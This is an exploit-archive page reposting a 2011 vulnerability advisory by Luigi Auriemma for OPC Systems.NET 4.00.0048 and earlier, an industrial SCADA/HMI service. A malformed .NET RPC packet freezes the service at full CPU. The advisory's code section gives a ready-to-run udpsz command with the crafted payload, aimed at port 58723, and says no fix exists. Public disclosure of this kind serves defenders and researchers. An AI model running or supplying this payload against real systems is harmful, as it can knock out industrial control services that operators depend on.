Home / exploits OPC Systems.NET 4.00.0048 Denial Of Service
Posted on 11 October 2011
####################################################################### Luigi Auriemma Application: OPC Systems.NET http://www.opcsystems.com/opc_systems_net.htm Versions: <= 4.00.0048 Platforms: Windows Bug: Denial of Service Exploitation: remote Date: 10 Oct 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "As a Service Oriented Architecture the OPC Systems Service can connect to data from OPC Servers, OPC Clients, Visual Studio Applications, Microsoft Excel, and databases ... breakthrough .NET products for SCADA, HMI, and plant floor to business solutions to shorten your development to deployment time." ####################################################################### ====== 2) Bug ====== OPCSystemsService.exe can be freezed with CPU at 100% through a malformed .NET RPC packet. No additional research performed. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip udpsz -l 2000 -c ".NET1�����xffxffxffxff4�11x25���tcp://127.0.0.1/OPC Systems Interface6�11" -T SERVER 58723 0x80 ####################################################################### ====== 4) Fix ====== No fix. #######################################################################
